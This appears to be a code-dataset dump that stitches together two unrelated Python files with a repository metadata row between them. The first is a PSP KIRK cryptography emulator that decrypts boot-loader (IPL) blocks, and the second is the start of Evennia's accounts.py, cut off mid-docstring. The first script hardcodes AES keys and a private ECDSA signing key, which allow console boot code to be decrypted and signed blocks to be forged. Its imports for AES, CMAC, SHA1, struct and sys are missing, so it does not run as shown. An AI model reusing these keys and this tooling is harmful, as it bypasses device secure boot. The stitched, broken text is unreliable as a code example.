from Crypto import Random
from ecdsa.ellipticcurve import CurveFp, Point
from ecdsa.curves import Curve
from ecdsa import SigningKey
# AES-128 key table used by the kirk4/kirk7 emulation below; the `key`
# argument of those functions indexes into this list (key seed). Each entry
# is a 16-byte key as a hex string.
_k4_k7_keys = [
    '2C92E5902B86C106B72EEA6CD4EC7248',
    '058DC80B33A5BF9D5698FAE0D3715E1F',
    'B813C35EC64441E3DC3C16F5B45E6484',
    '9802C4E6EC9E9E2FFC634CE42FBB4668',
    '99244CD258F51BCBB0619CA73830075F',
    '0225D7BA63ECB94A9D237601B3F6AC17',
    '6099F28170560E5F747CB520C0CDC23C',
    '76368B438F77D87EFE5FB6115939885C',
    '14A115EB434A1BA4905E03B617A15C04',
    'E65803D9A71AA87F059D229DAF5453D0',
    'BA3480B428A7CA5F216412F70FBB7323',
    '72AD35AC9AC3130A778CB19D88550B0C',
    '8485C848750843BC9B9AECA79C7F6018',
    'B5B16EDE23A97B0EA17CDBA2DCDEC46E',
    'C871FDB3BCC5D2F2E2D7729DDF826882',
    '0ABB336C96D4CDD8CB5F4BE0BADB9E03',
    '32295BD5EAF7A34216C88E48FF50D371',
    '46F25E8E4D2AA540730BC46E47EE6F0A',
    '5DC71139D01938BC027FDDDCB0837D9D',
    '51DD65F071A4E5EA6AAF12194129B8F4',
    '03763C6865C69B0FFE8FD8EEA43616A0',
    '7D50B85CAF6769F0E54AA8098B0EBE1C',
    '72684B32AC3B332F2A7AFC9E14D56F6B',
    '201D31964AD99FBF32D5D61C491BD9FC',
    'F8D84463D610D12A448E9690A6BB0BAD',
    '5CD4057FA13060440AD9B6745F244F4E',
    'F48AD678599C22C1D411933DF845B893',
    'CAE7D287A2ECC1CD94542B5E1D9488B2',
    'DE26D37A39956C2AD8C3A6AF21EBB301',
    '7CB68B4DA38D1DD932679CA99FFB2852',
    'A0B556B469AB368F36DEC9092ECB41B1',
    '939DE19B725FEEE2452ABC1706D14769',
    'A4A4E621382EF1AF7B177AE842AD0031',
    'C37F13E8CF84DB34747BC3A0F19D3A73',
    '2BF7838AD898E95FA5F901DA61FE35BB',
    'C704621E714A66EA62E04B203DB8C2E5',
    'C933859AAB00CDCE4D8B8E9F3DE6C00F',
    '1842561F2B5F34E3513EB78977431A65',
    'DCB0A0065A50A14E59AC973F1758A3A3',
    'C4DBAE83E29CF254A3DD374E807BF425',
    'BFAEEB498265C57C64B8C17E19064409',
    '797CECC3B3EE0AC03BD8E6C1E0A8B1A4',
    '7534FE0BD6D0C28D68D4E02AE7D5D155',
    'FAB35326974F4EDFE4C3A814C32F0F88',
    'EC97B386B433C6BF4E539D95EBB979E4',
    'B320A204CF480629B5DD8EFC98D4177B',
    '5DFC0D4F2C39DA684A3374ED4958A73A',
    'D75A5422CED9A3D62B557D8DE8BEC7EC',
    '6B4AEE4345AE7007CF8DCF4E4AE93CFA',
    '2B522F664C2D114CFE61318C56784EA6',
    '3AA34E44C66FAF7BFAE55327EFCFCC24',
    '2B5C78BFC38E499D41C33C5C7B2796CE',
    'F37EEAD2C0C8231DA99BFA495DB7081B',
    '708D4E6FD1F66F1D1E1FCB02F9B39926',
    '0F6716E180699C51FCC7AD6E4FB846C9',
    '560A494A844C8ED982EE0B6DC57D208D',
    '12468D7E1C42209BBA5426835EB03303',
    'C43BB6D653EE67493EA95FBC0CED6F8A',
    '2CC3CF8C2878A5A663E2AF2D715E86BA',
    '833DA70CED6A2012D196E6FE5C4D37C5',
    'C743D06742EE90B8CA75503520ADBCCE',
    '8AE3663F8D9E82A1EDE68C9CE8256DAA',
    '7FC96F0BB1485CA55DD364B77AF5E4EA',
    '91B765788BCB8BD402ED553A6662D0AD',
    '2824F9101B8D0F7B6EB263B5B55B2EBB',
    '30E2575DE0A249CEE8CF2B5E4D9F52C7',
    '5EE50439623202FA85393F72BB77FD1A',
    'F88174B1BDE9BFDD45E2F55589CF46AB',
    '7DF49265E3FAD678D6FE78ADBB3DFB63',
    '747FD62DC7A1CA96E27ACEFFAA723FF7',
    '1E58EBD065BBF168C5BDF746BA7BE100',
    '24347DAF5E4B35727A52276BA05474DB',
    '09B1C705C35F536677C0EB3677DF8307',
    'CCBE615C05A20033378E5964A7DD703D',
    '0D4750BBFCB0028130E184DEA8D48413',
    '0CFD679AF9B4724FD78DD6E99642288B',
    '7AD31A8B4BEFC2C2B39901A9FE76B987',
    'BE787817C7F16F1AE0EF3BDE4CC2D786',
    '7CD8B891910A4314D0533DD84C45BE16',
    '32722C8807CF357D4A2F511944AE68DA',
    '7E6BBFF6F687B898EEB51B3216E46E5D',
    '08EA5A8349B59DB53E0779B19A59A354',
    'F31281BFE69F51D164082521FFBB2261',
    'AFFE8EB13DD17ED80A61241C959256B6',
    '92CDB4C25BF2355A2309E819C9144235',
    'E1C65B226BE1DA02BA18FA21349EF96D',
    '14EC76CE97F38A0A34506C539A5C9AB4',
    '1C9BC490E3066481FA59FDB600BB2870',
    '43A5CACC0D6C2D3F2BD989676B3F7F57',
    '00EFFD1808A405893C38FB2572706106',
    'EEAF49E009879BEFAAD6326A3213C429',
    '8D26B90F431DBB08DB1DDAC5B52C92ED',
    '577C3060AE6EBEAE3AAB1819C571680B',
    '115A5D20D53A8DD39CC5AF410F0F186F',
    '0D4D51AB2379BF803ABFB90E75FC14BF',
    '9993DA3E7D2E5B15F252A4E66BB85A98',
    'F42830A5FB0D8D760EA671C22BDE669D',
    'FB5FEB7FC7DCDD693701979B29035C47',
    '02326AE7D396CE7F1C419DD65207ED09',
    '9C9B1372F8C640CF1C62F5D592DDB582',
    '03B302E85FF381B13B8DAA2A90FF5E61',
    'BCD7F9D32FACF847C0FB4D2F309ABDA6',
    'F55596E97FAF867FACB33AE69C8B6F93',
    'EE297093F94E445944171F8E86E170FC',
    'E434520CF088CFC8CD781B6CCF8C48C4',
    'C1BF66818EF953F2E1266B6F550CC9CD',
    '560FFF8F3C9649144516F1BCBFCEA30C',
    '2408DC753760A29F0554B5F243857399',
    'DDD5B56A59C55AE83B9667C75C2AE2DC',
    'AA686772E02D44D5CDBB6504BCD5BF4E',
    '1F17F014E777A2FE4B136B56CD7EF7E9',
    'C93548CF558D7503896B2EEB618CA902',
    'DE34C541E7CA86E8BEA7C31CECE4360F',
    'DDE5FF551B74F6F4E016D7AB22311B6A',
    'B0E93521333FD7BAB4762CCB4D8008D8',
    '381469C4C3F91B9633638E4D5F3DF029',
    'FA486AD98E6716EF6AB087F589457F2A',
    '321A091250148A3E963DEA025932E18F',
    '4B00BE29BCB02864CEFD43A96FD95CED',
    '577DC4FF0244E28091F4CA0A7569FDA8',
    '835336C61803E43E4EB30F6B6E799B7A',
    '5C9265FD7B596AA37A2F509D85E927F8',
    '9A39FB89DF55B2601424CEA6D9650A9D',
    '8B75BE91A8C75AD2D7A594A01CBB9591',
    '95C21B8D05ACF5EC5AEE77812395C4D7',
    'B9A461643633FA5D9488E2D3281E01A2',
    'B8B084FB9F4CFAF730FE7325A2AB897D',
    '5F8C179FC1B21DF1F6367A9CF7D3D47C'
]
def kirk4(data, key):
    """Emulate KIRK command 4: AES-128-CBC *encrypt* `data` with the key
    selected by index `key` from `_k4_k7_keys`, using an all-zero IV.
    `data` length must be a multiple of 16 bytes (AES block size)."""
    key_bytes = bytes.fromhex(_k4_k7_keys[key])
    cipher = AES.new(key_bytes, AES.MODE_CBC, iv=b'\x00' * 16)
    return cipher.encrypt(data)
def kirk7(data, key):
    """Emulate KIRK command 7: AES-128-CBC *decrypt* `data` with the key
    selected by index `key` from `_k4_k7_keys`, using an all-zero IV.
    Inverse of kirk4 for the same key index."""
    key_bytes = bytes.fromhex(_k4_k7_keys[key])
    cipher = AES.new(key_bytes, AES.MODE_CBC, iv=b'\x00' * 16)
    return cipher.decrypt(data)
class Kirk1(object):
    """Emulation of KIRK command 1 (decrypt) and its inverse (encrypt),
    supporting both CMAC- and ECDSA-authenticated headers.
    NOTE: the CBC cipher objects created in __init__ are stateful, so an
    instance is intended for a single encrypt/decrypt operation (the
    caller below creates a fresh Kirk1 per block)."""
    def __init__(self):
        # AES key used to (de)crypt the per-block key material at the
        # start of a kirk1 header.
        self.key = bytes.fromhex('98C940975C1D10E87FE60EA3FD03A8BA')
        self.iv = bytes.fromhex('00000000000000000000000000000000')
        # Custom 160-bit elliptic curve parameters — presumably the PSP
        # KIRK curve; TODO confirm against hardware documentation.
        p = 0xFFFFFFFFFFFFFFFF00000001FFFFFFFFFFFFFFFF
        a = -3
        b = 0x65D1488C0359E234ADC95BD3908014BD91A525F9
        Gx = 0x2259ACEE15489CB096A882F0AE1CF9FD8EE5F8FA
        Gy = 0x604358456D0A1CB2908DE90F27D75C82BEC108C0
        r = 0xffffffffffffffff0001b5c617f290eae1dbad8f
        curve = CurveFp(p, a, b)
        generator = Point(curve, Gx, Gy, r)
        # The last argument is the curve OID; the value here is a dummy.
        self.curve = Curve("KIRK", curve, generator, (1, 3, 3, 7, 4))
        # Static signing key — lets us both produce and verify signatures.
        self.sk = SigningKey.from_string(bytes.fromhex('F392E26490B80FD889F2D9722C1F34D7274F983D'), curve=self.curve)
        self.vk = self.sk.get_verifying_key()
        # Separate stateful CBC contexts for encrypt and decrypt paths.
        self.k1_enc = AES.new(self.key, AES.MODE_CBC, self.iv)
        self.k1_dec = AES.new(self.key, AES.MODE_CBC, self.iv)
    def decrypt(self, block):
        """Verify (CMAC or ECDSA, per the header flag) and decrypt one
        kirk1 block, returning the plaintext payload."""
        mode = struct.unpack("<I", block[0x60:0x64])[0]
        ecdsa = struct.unpack("<I", block[0x64:0x68])[0]
        size = struct.unpack("<I", block[0x70:0x74])[0]
        offset = struct.unpack("<I", block[0x74:0x78])[0]
        # round size up so size+offset lands on a 16-byte AES boundary
        padding = 0
        while (size + offset + padding) % 16 != 0:
            padding = padding + 1
        size = size + padding
        # decrypt our kirk keys
        keys = self.k1_dec.decrypt(block[0x00:0x20])
        # keys[0x00:0x10] = AES data key, keys[0x10:0x20] = CMAC key
        if ecdsa == 1:
            self.__verify_ecdsa(block, size, offset)
        else:
            self.__verify_cmac(keys[0x10:0x20], block, size, offset)
        # payload starts at 0x90 plus the salt/metadata offset
        aes = AES.new(keys[0x00:0x10], AES.MODE_CBC, self.iv)
        return aes.decrypt(block[0x90+offset:0x90+offset+size])
    def encrypt(self, data, salt=b'', key=None, ecdsa=False, cmac_key=None):
        """Build a kirk1 block from `data`; random AES key unless given.
        Chooses ECDSA or CMAC authentication via the `ecdsa` flag."""
        if key == None:
            key = Random.get_random_bytes(0x10);
        return self.__encrypt_ecdsa(data, key, salt) if ecdsa else self.__encrypt_cmac(data, key, cmac_key, salt)
    def __encrypt_ecdsa(self, data, key, salt):
        """Assemble an ECDSA-signed kirk1 block (header sig + data sig)."""
        aes = AES.new(key, AES.MODE_CBC, self.iv)
        # generate header and sign
        kirk_header2 = struct.pack('<II8xII8x16x', 1, 1, len(data), len(salt))
        header_signature = self.sk.sign(kirk_header2)
        # generate second part of block and sign
        block = kirk_header2 + salt + aes.encrypt(data)
        data_signature = self.sk.sign(block)
        # encrypt the aes key and package signatures
        block = self.k1_enc.encrypt(key) + header_signature + data_signature + block
        # verify our signatures are valid
        self.__verify_ecdsa(block, len(data), len(salt))
        return block
    def __encrypt_cmac(self, data, key, cmac_key, salt):
        """Assemble a CMAC-authenticated kirk1 block (header MAC + data MAC)."""
        aes = AES.new(key, AES.MODE_CBC, self.iv)
        cmac_key = cmac_key if cmac_key != None else Random.get_random_bytes(0x10)
        cmac = CMAC.new(cmac_key, ciphermod=AES)
        # generate header and mac
        kirk_header2 = struct.pack('<II8xII8x16x', 1, 0, len(data), len(salt))
        cmac.update(kirk_header2)
        header_mac = cmac.digest()
        # generate second part of block and mac
        block = kirk_header2 + salt + aes.encrypt(data)
        cmac = CMAC.new(cmac_key, ciphermod=AES)
        cmac.update(block)
        data_mac = cmac.digest()
        # encrypt the aes key and package mac
        block = self.k1_enc.encrypt(key + cmac_key) + header_mac + data_mac + b'\x00'*0x20 + block
        # verify our signatures are valid
        self.__verify_cmac(cmac_key, block, len(data), len(salt))
        return block
    def __verify_ecdsa(self, block, size, offset):
        """Raise if either the header or data ECDSA signature is invalid."""
        self.vk.verify(block[0x10:0x10+0x28], block[0x60:0x60+0x30])
        self.vk.verify(block[0x38:0x38+0x28], block[0x60:0x60+0x30+size+offset])
    def __verify_cmac(self, key, block, size, offset):
        """Raise if either the header or data CMAC does not verify."""
        cobj = CMAC.new(key, ciphermod=AES)
        cobj.update(block[0x60:0x60+0x30])
        cobj.verify(block[0x20:0x30])
        cobj = CMAC.new(key, ciphermod=AES)
        cobj.update(block[0x60:0x90+size+offset])
        cobj.verify(block[0x30:0x40])
def print_usage():
    """Print this script's command-line usage to stdout."""
    usage = 'usage: {} [ipl] [img]'.format(sys.argv[0])
    print(usage)
# --- script entry: decrypt an encrypted IPL into a flat memory image ---
if len(sys.argv) != 3:
    print_usage()
    sys.exit(1)
data = open(sys.argv[1], 'rb').read()
out = open(sys.argv[2], 'wb')
# IPL blocks load into a 2 MiB window based at 0x04000000
BASE = 0x04000000
memory = b'\x00'*(2*1024*1024)
# the encrypted IPL is a sequence of 0x1000-byte kirk1 blocks
blocks = [data[x:x+0x1000] for x in range(0, len(data), 0x1000)]
lowest_addr = BASE + len(memory)
highest_addr = BASE
prev_blk_sum = 0
for block in blocks:
    # fresh Kirk1 per block: its CBC cipher objects are stateful
    k1 = Kirk1()
    blk = k1.decrypt(block)
    # 0x10-byte plain header: load address, payload size, entry point,
    # and the running checksum of the *previous* block's payload
    load_addr, size, entry, csum = struct.unpack('<IIII', blk[:0x10])
    addr_offset = load_addr - BASE
    # check hash
    # NOTE: `hash` shadows the builtin of the same name (harmless here)
    hash = SHA1.new(blk[8:0x10+size] + blk[:8]).digest()
    hash_dec = kirk7(block[-0x20:], 0x6C)[:0x14]
    print(f'hash calculated: {hash.hex()}')
    print(f'hash decrypted : {hash_dec.hex()}')
    assert hash == hash_dec
    assert prev_blk_sum == csum
    # verify that the checksum matches
    # (recompute the word-wise sum of this payload for the next block)
    prev_blk_sum = 0
    for i in range(0, size, 4):
        prev_blk_sum += struct.unpack('<I', blk[0x10+i:0x10+i+4])[0]
    prev_blk_sum &= 0xFFFFFFFF
    print(f'addr: {load_addr:08X}, size: {size:08X}, entry: {entry:08X}, csum: {csum:08X}')
    print(f'got checksum: {prev_blk_sum:08X}')
    # splice this payload into the memory image at its load address
    memory = memory[:addr_offset] + blk[0x10:0x10+size] + memory[addr_offset+size:]
    if load_addr < lowest_addr:
        lowest_addr = load_addr
    if load_addr + size > highest_addr:
        highest_addr = load_addr + size
    # a non-zero entry point marks the final block
    if entry:
        break
print(f'load at: {lowest_addr:X}')
# write only the populated span of the memory image
decrypted_img = memory[lowest_addr-BASE:highest_addr-BASE]
out.write(decrypted_img)
# an IPL is MAX 0x1000 bytes per blocks, including any necessary headers
# assuming we eventually exceed that size we need to create multiple
# blocks
remaining_size = len(data)
# checksum = 0
# seek = 0
# while remaining_size > 0:
# # 0xC0 is 0x90 for kirk header + 0x10 IPL header + 0x20 hash
# block_size = (0x1000 - 0xC0) if remaining_size > (0x1000 - 0xC0) else remaining_size
# remaining_size = remaining_size - block_size
# entry = 0 if remaining_size > 0 else (load_address | 0x00000000)
# block = struct.pack('<IIII', load_address + seek, block_size, entry, checksum) + data[seek:seek+block_size]
# # calculate SHA1 hash
# block_hash = SHA1.new(block[8:] + block[:8]).digest() + b'\x00'*12
# assert len(block_hash) == 0x20
# if block_size % 0x10 != 0:
# diff = 0x10 - (block_size % 0x10)
# block += b"\x00"*diff
# block_size += diff
# checksum = 0
# for i in range(0, block_size, 4):
# checksum += struct.unpack('<I', block[0x10+i:0x10+i+4])[0]
# checksum &= 0xFFFFFFFF
# kirk1 = Kirk1()
# block = kirk1.encrypt(block, ecdsa=True)
# kirk1.decrypt(block)
# if (len(block) != 0xFE0):
# block += b'\x00'*(0xFE0-len(block))
# out.write(block + kirk4(block_hash, 0x6C))
# seek = seek + block_size
| [
"git@davee.pro"
] | git@davee.pro |
7a1b250d70836eea4d41151baba4c99d37dad85c | 5d8cecc379bb828694662c865930be8c75d26943 | /evennia/accounts/accounts.py | 626c4a60f3a83d7b5cfa779d6967e68f0be50d6e | [
"BSD-3-Clause"
] | permissive | job/evennia | 714e0f3699875169ce0987e4ebc6b5340bef8cbd | 5aaa0fcfee6082a3a2259a6562c459c5f21fb591 | refs/heads/master | 2021-05-08T23:56:14.348366 | 2018-01-30T17:22:24 | 2018-01-30T17:22:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 38,062 | py | """
Typeclass for Account objects
Note that this object is primarily intended to
store OOC information, not game info! This
object represents the actual user (not their
character) and has NO actual precence in the
game world (this is handled by the associated
character object, so you should customize that
instead for most things).
"""
import time
from django.conf import settings
from django.utils import timezone
from evennia.typeclasses.models import TypeclassBase
from evennia.accounts.manager import AccountManager
from evennia.accounts.models import AccountDB
from evennia.objects.models import ObjectDB
from evennia.comms.models import ChannelDB
from evennia.commands import cmdhandler
from evennia.utils import logger
from evennia.utils.utils import (lazy_property,
make_iter, to_unicode, is_iter,
variable_from_module)
from evennia.typeclasses.attributes import NickHandler
from evennia.scripts.scripthandler import ScriptHandler
from evennia.commands.cmdsethandler import CmdSetHandler
from django.utils.translation import ugettext as _
from future.utils import with_metaclass
__all__ = ("DefaultAccount",)
# lazily populated reference to the global session handler (see helpers below)
_SESSIONS = None
# callable resolved from settings for formatting search results
_AT_SEARCH_RESULT = variable_from_module(*settings.SEARCH_AT_RESULT.rsplit('.', 1))
# cached settings values, looked up once at import time
_MULTISESSION_MODE = settings.MULTISESSION_MODE
_MAX_NR_CHARACTERS = settings.MAX_NR_CHARACTERS
_CMDSET_ACCOUNT = settings.CMDSET_ACCOUNT
# lazily resolved channel for connect/disconnect announcements
_CONNECT_CHANNEL = None
class AccountSessionHandler(object):
    """
    Tracks the server Sessions currently attached to an Account.
    """
    def __init__(self, account):
        """
        Initializes the handler.
        Args:
            account (Account): The Account this handler is defined on.
        """
        self.account = account
    def get(self, sessid=None):
        """
        Retrieve sessions linked to this account.
        Args:
            sessid (int, optional): If given, restrict the lookup to
                the session with this session id.
        Returns:
            sessions (list): Matching Session objects. When `sessid`
                is given, the list holds one (or zero) elements.
        """
        global _SESSIONS
        if not _SESSIONS:
            # resolved lazily to avoid circular imports at load time
            from evennia.server.sessionhandler import SESSIONS as _SESSIONS
        if not sessid:
            return _SESSIONS.sessions_from_account(self.account)
        return make_iter(_SESSIONS.session_from_account(self.account, sessid))
    def all(self):
        """
        Convenience alias for `get()` with no arguments.
        Returns:
            sessions (list): All sessions attached to this account.
        """
        return self.get()
    def count(self):
        """
        Count connected sessions.
        Returns:
            sesslen (int): Number of sessions handled.
        """
        return len(self.get())
class DefaultAccount(with_metaclass(TypeclassBase, AccountDB)):
"""
This is the base Typeclass for all Accounts. Accounts represent
the person playing the game and tracks account info, password
etc. They are OOC entities without presence in-game. An Account
can connect to a Character Object in order to "enter" the
game.
Account Typeclass API:
* Available properties (only available on initiated typeclass objects)
- key (string) - name of account
- name (string)- wrapper for user.username
- aliases (list of strings) - aliases to the object. Will be saved to
database as AliasDB entries but returned as strings.
- dbref (int, read-only) - unique #id-number. Also "id" can be used.
- date_created (string) - time stamp of object creation
- permissions (list of strings) - list of permission strings
- user (User, read-only) - django User authorization object
- obj (Object) - game object controlled by account. 'character' can also
be used.
- sessions (list of Sessions) - sessions connected to this account
- is_superuser (bool, read-only) - if the connected user is a superuser
* Handlers
- locks - lock-handler: use locks.add() to add new lock strings
- db - attribute-handler: store/retrieve database attributes on this
self.db.myattr=val, val=self.db.myattr
- ndb - non-persistent attribute handler: same as db but does not
create a database entry when storing data
- scripts - script-handler. Add new scripts to object with scripts.add()
- cmdset - cmdset-handler. Use cmdset.add() to add new cmdsets to object
- nicks - nick-handler. New nicks with nicks.add().
* Helper methods
- msg(text=None, from_obj=None, session=None, options=None, **kwargs)
- execute_cmd(raw_string)
- search(ostring, global_search=False, attribute_name=None,
use_nicks=False, location=None,
ignore_errors=False, account=False)
- is_typeclass(typeclass, exact=False)
- swap_typeclass(new_typeclass, clean_attributes=False, no_default=True)
- access(accessing_obj, access_type='read', default=False, no_superuser_bypass=False)
- check_permstring(permstring)
* Hook methods
basetype_setup()
at_account_creation()
> note that the following hooks are also found on Objects and are
usually handled on the character level:
- at_init()
- at_access()
- at_cmdset_get(**kwargs)
- at_first_login()
- at_post_login(session=None)
- at_disconnect()
- at_message_receive()
- at_message_send()
- at_server_reload()
- at_server_shutdown()
"""
objects = AccountManager()
# properties
    @lazy_property
    def cmdset(self):
        """CmdSetHandler for this account, created on first access."""
        return CmdSetHandler(self, True)
    @lazy_property
    def scripts(self):
        """ScriptHandler for this account, created on first access."""
        return ScriptHandler(self)
    @lazy_property
    def nicks(self):
        """NickHandler for this account, created on first access."""
        return NickHandler(self)
    @lazy_property
    def sessions(self):
        """AccountSessionHandler for this account, created on first access."""
        return AccountSessionHandler(self)
# session-related methods
    def disconnect_session_from_account(self, session, reason=None):
        """
        Access method for disconnecting a given session from the
        account (connection happens automatically in the
        sessionhandler)
        Args:
            session (Session): Session to disconnect.
            reason (str, optional): Eventual reason for the disconnect.
        """
        global _SESSIONS
        if not _SESSIONS:
            # lazy import to avoid a circular dependency at module load
            from evennia.server.sessionhandler import SESSIONS as _SESSIONS
        _SESSIONS.disconnect(session, reason)
# puppeting operations
    def puppet_object(self, session, obj):
        """
        Use the given session to control (puppet) the given object (usually
        a Character type).
        Args:
            session (Session): session to use for puppeting
            obj (Object): the object to start puppeting
        Raises:
            RuntimeError: If puppeting is not possible, the
                `exception.msg` will contain the reason.
        Notes:
            The ordering of the checks and state mutations below is
            significant; do not reorder without care.
        """
        # safety checks
        if not obj:
            raise RuntimeError("Object not found")
        if not session:
            raise RuntimeError("Session not found")
        if self.get_puppet(session) == obj:
            # already puppeting this object
            self.msg("You are already puppeting this object.")
            return
        if not obj.access(self, 'puppet'):
            # no access
            self.msg("You don't have permission to puppet '%s'." % obj.key)
            return
        if obj.account:
            # object already puppeted
            if obj.account == self:
                if obj.sessions.count():
                    # we may take over another of our sessions
                    # output messages to the affected sessions
                    if _MULTISESSION_MODE in (1, 3):
                        # modes 1 and 3 allow several sessions to share a puppet
                        txt1 = "Sharing |c%s|n with another of your sessions."
                        txt2 = "|c%s|n|G is now shared from another of your sessions.|n"
                        self.msg(txt1 % obj.name, session=session)
                        self.msg(txt2 % obj.name, session=obj.sessions.all())
                    else:
                        # other modes: forcibly move the puppet to this session
                        txt1 = "Taking over |c%s|n from another of your sessions."
                        txt2 = "|c%s|n|R is now acted from another of your sessions.|n"
                        self.msg(txt1 % obj.name, session=session)
                        self.msg(txt2 % obj.name, session=obj.sessions.all())
                        self.unpuppet_object(obj.sessions.get())
            elif obj.account.is_connected:
                # controlled by another account
                self.msg("|c%s|R is already puppeted by another Account." % obj.key)
                return
        # do the puppeting
        if session.puppet:
            # cleanly unpuppet eventual previous object puppeted by this session
            self.unpuppet_object(session)
        # if we get to this point the character is ready to puppet or it
        # was left with a lingering account/session reference from an unclean
        # server kill or similar
        obj.at_pre_puppet(self, session=session)
        # do the connection
        obj.sessions.add(session)
        obj.account = self
        session.puid = obj.id
        session.puppet = obj
        # validate/start persistent scripts on object
        obj.scripts.validate()
        # re-cache locks to make sure superuser bypass is updated
        obj.locks.cache_lock_bypass(obj)
        # final hook
        obj.at_post_puppet()
def unpuppet_object(self, session):
"""
Disengage control over an object.
Args:
session (Session or list): The session or a list of
sessions to disengage from their puppets.
Raises:
RuntimeError With message about error.
"""
for session in make_iter(session):
obj = session.puppet
if obj:
# do the disconnect, but only if we are the last session to puppet
obj.at_pre_unpuppet()
obj.sessions.remove(session)
if not obj.sessions.count():
del obj.account
obj.at_post_unpuppet(self, session=session)
# Just to be sure we're always clear.
session.puppet = None
session.puid = None
    def unpuppet_all(self):
        """
        Disconnect all puppets. This is called by server before a
        reset/shutdown.
        """
        # delegates to unpuppet_object with every connected session
        self.unpuppet_object(self.sessions.all())
    def get_puppet(self, session):
        """
        Get an object puppeted by this session through this account. This is
        the main method for retrieving the puppeted object from the
        account's end.
        Args:
            session (Session): Find puppeted object based on this session
        Returns:
            puppet (Object): The matching puppeted object, if any.
        """
        # the session itself tracks its puppet; this is just an accessor
        return session.puppet
def get_all_puppets(self):
"""
Get all currently puppeted objects.
Returns:
puppets (list): All puppeted objects currently controlled
by this Account.
"""
return list(set(session.puppet for session in self.sessions.all() if session.puppet))
def __get_single_puppet(self):
"""
This is a legacy convenience link for use with `MULTISESSION_MODE`.
Returns:
puppets (Object or list): Users of `MULTISESSION_MODE` 0 or 1 will
always get the first puppet back. Users of higher `MULTISESSION_MODE`s will
get a list of all puppeted objects.
"""
puppets = self.get_all_puppets()
if _MULTISESSION_MODE in (0, 1):
return puppets and puppets[0] or None
return puppets
character = property(__get_single_puppet)
puppet = property(__get_single_puppet)
# utility methods
    def delete(self, *args, **kwargs):
        """
        Deletes the account permanently.
        Notes:
            `*args` and `**kwargs` are passed on to the base delete
            mechanism (these are usually not used).
            Sessions are unpuppeted and disconnected first, then
            scripts/attributes/nicks/aliases are cleared before the
            database row itself is removed.
        """
        for session in self.sessions.all():
            # unpuppeting all objects and disconnecting the user, if any
            # sessions remain (should usually be handled from the
            # deleting command)
            try:
                self.unpuppet_object(session)
            except RuntimeError:
                # no puppet to disconnect from
                pass
            session.sessionhandler.disconnect(session, reason=_("Account being deleted."))
        self.scripts.stop()
        self.attributes.clear()
        self.nicks.clear()
        self.aliases.clear()
        # finally remove the underlying database object
        super(DefaultAccount, self).delete(*args, **kwargs)
# methods inherited from database model
    def msg(self, text=None, from_obj=None, session=None, options=None, **kwargs):
        """
        Evennia -> User
        This is the main route for sending data back to the user from the
        server.
        Args:
            text (str, optional): text data to send
            from_obj (Object or Account or list, optional): Object sending. If given, its
                at_msg_send() hook will be called. If iterable, call on all entities.
            session (Session or list, optional): Session object or a list of
                Sessions to receive this send. If given, overrules the
                default send behavior for the current
                MULTISESSION_MODE.
            options (list): Protocol-specific options. Passed on to the protocol.
        Kwargs:
            any (dict): All other keywords are passed on to the protocol.
        """
        if from_obj:
            # call hook
            for obj in make_iter(from_obj):
                try:
                    obj.at_msg_send(text=text, to_obj=self, **kwargs)
                except Exception:
                    # this may not be assigned.
                    logger.log_trace()
        try:
            # give at_msg_receive a chance to veto delivery
            if not self.at_msg_receive(text=text, **kwargs):
                # abort message to this account
                return
        except Exception:
            # this may not be assigned.
            # deliberate best-effort: a failing hook must not block output
            pass
        kwargs["options"] = options
        # session relay
        # an explicit session (or list) narrows the target; otherwise all
        # connected sessions receive the message
        sessions = make_iter(session) if session else self.sessions.all()
        for session in sessions:
            session.data_out(text=text, **kwargs)
    def execute_cmd(self, raw_string, session=None, **kwargs):
        """
        Do something as this account. This method is never called normally,
        but only when the account object itself is supposed to execute the
        command. It takes account nicks into account, but not nicks of
        eventual puppets.
        Args:
            raw_string (str): Raw command input coming from the command line.
            session (Session, optional): The session to be responsible
                for the command-send
        Kwargs:
            kwargs (any): Other keyword arguments will be added to the
                found command object instance as variables before it
                executes. This is unused by default Evennia but may be
                used to set flags and change operating paramaters for
                commands at run-time.
        """
        # to_unicode is the Python-2 era normalization used project-wide
        raw_string = to_unicode(raw_string)
        # apply account-level nick substitutions before parsing
        raw_string = self.nicks.nickreplace(raw_string, categories=("inputline", "channel"), include_account=False)
        if not session and _MULTISESSION_MODE in (0, 1):
            # for these modes we use the first/only session
            sessions = self.sessions.get()
            session = sessions[0] if sessions else None
        return cmdhandler.cmdhandler(self, raw_string,
                                     callertype="account", session=session, **kwargs)
    def search(self, searchdata, return_puppet=False, search_object=False,
               typeclass=None, nofound_string=None, multimatch_string=None, use_nicks=True, **kwargs):
        """
        This is similar to `DefaultObject.search` but defaults to searching
        for Accounts only.
        Args:
            searchdata (str or int): Search criterion, the Account's
                key or dbref to search for.
            return_puppet (bool, optional): Instructs the method to
                return matches as the object the Account controls rather
                than the Account itself (or None) if nothing is puppeted).
            search_object (bool, optional): Search for Objects instead of
                Accounts. This is used by e.g. the @examine command when
                wanting to examine Objects while OOC.
            typeclass (Account typeclass, optional): Limit the search
                only to this particular typeclass. This can be used to
                limit to specific account typeclasses or to limit the search
                to a particular Object typeclass if `search_object` is True.
            nofound_string (str, optional): A one-time error message
                to echo if `searchdata` leads to no matches. If not given,
                will fall back to the default handler.
            multimatch_string (str, optional): A one-time error
                message to echo if `searchdata` leads to multiple matches.
                If not given, will fall back to the default handler.
            use_nicks (bool, optional): Use account-level nick replacement.
        Return:
            match (Account, Object or None): A single Account or Object match.
        Notes:
            Extra keywords are ignored, but are allowed in call in
            order to make API more consistent with
            objects.objects.DefaultObject.search.
        """
        # handle me, self and *me, *self
        # NOTE: `basestring` makes this module Python 2 only
        if isinstance(searchdata, basestring):
            # handle wrapping of common terms
            if searchdata.lower() in ("me", "*me", "self", "*self",):
                return self
        if search_object:
            matches = ObjectDB.objects.object_search(searchdata, typeclass=typeclass, use_nicks=use_nicks)
        else:
            # account search applies account-category nicks first
            searchdata = self.nicks.nickreplace(searchdata, categories=("account", ), include_account=False)
            matches = AccountDB.objects.account_search(searchdata, typeclass=typeclass)
        # _AT_SEARCH_RESULT narrows multiple/zero matches and handles messaging
        matches = _AT_SEARCH_RESULT(matches, self, query=searchdata,
                                    nofound_string=nofound_string,
                                    multimatch_string=multimatch_string)
        if matches and return_puppet:
            try:
                return matches.puppet
            except AttributeError:
                return None
        return matches
    def access(self, accessing_obj, access_type='read', default=False, no_superuser_bypass=False, **kwargs):
        """
        Determines if another object has permission to access this
        object in whatever way.
        Args:
            accessing_obj (Object): Object trying to access this one.
